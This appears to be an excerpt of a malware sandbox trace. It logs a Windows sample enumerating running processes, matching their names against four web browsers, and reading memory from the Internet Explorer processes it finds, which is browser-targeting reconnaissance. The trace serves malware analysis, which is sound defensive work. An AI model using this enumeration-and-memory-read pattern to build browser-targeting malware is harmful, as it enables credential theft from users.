	[0237.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.439] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.439] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0237.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7ae4
	[0237.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.440] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0237.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.440] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.440] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0237.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.441] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.441] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0237.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7ae8
	[0237.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.442] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0237.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.442] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.442] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0237.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.443] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.443] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0237.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0237.444] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0237.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7aec
	[0237.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.445] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0237.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.445] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.446] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0237.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.446] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.447] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0237.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7af0
	[0237.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.448] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0237.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.449] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.449] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0237.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.449] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.449] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0237.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7af4
	[0237.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.450] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0237.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.451] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.451] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0237.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.451] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.452] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0237.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7af8
	[0237.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.453] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0237.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.453] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.454] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0237.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.454] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0237.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7afc
	[0237.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.456] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0237.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.456] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.457] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0237.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.457] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.458] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0237.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7b00
	[0237.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.459] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0237.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.459] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.459] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0237.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.460] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.460] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0237.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7b04
	[0237.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.461] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0237.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.461] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.461] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0237.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.462] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0237.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7b08
	[0237.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.463] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0237.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.463] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.465] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0237.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.465] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.466] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0237.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7b0c
	[0237.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.467] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0237.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.467] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.467] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0237.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.468] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.468] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0237.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7b10
	[0237.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.469] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0237.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.469] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.469] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0237.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.470] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.470] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0237.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7b14
	[0237.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.471] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0237.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.471] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.471] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0237.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.472] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.472] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0237.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7b18
	[0237.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.473] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0237.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.474] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.474] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0237.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.475] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0237.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7b1c
	[0237.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.476] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0237.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.477] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.477] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0237.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.478] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.478] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0237.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7b20
	[0237.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.479] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0237.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.480] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.480] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0237.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.481] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0237.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7b24
	[0237.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.482] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0237.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.483] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.483] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0237.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.484] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.484] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0237.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7b28
	[0237.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.485] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0237.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.485] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0237.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.485] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0237.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.486] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.486] NtQueryInformationProcess (in: ProcessHandle=0x7b28, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0237.486] ReadProcessMemory (in: hProcess=0x7b28, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0237.486] ReadProcessMemory (in: hProcess=0x7b28, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0237.486] ReadProcessMemory (in: hProcess=0x7b28, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0237.486] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0237.487] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0237.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7b2c
	[0237.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.488] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0237.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.488] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0237.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.488] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0237.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.488] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.489] NtQueryInformationProcess (in: ProcessHandle=0x7b2c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0237.489] ReadProcessMemory (in: hProcess=0x7b2c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0237.489] ReadProcessMemory (in: hProcess=0x7b2c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0237.489] ReadProcessMemory (in: hProcess=0x7b2c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0237.489] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0237.489] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0237.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7b30
	[0237.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.490] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0237.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.490] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.491] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0237.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.491] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.491] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0237.492] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7b34
	[0237.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.492] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0237.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.493] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.493] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0237.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.493] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.494] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7b38
	[0237.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.494] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.495] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.495] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.496] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
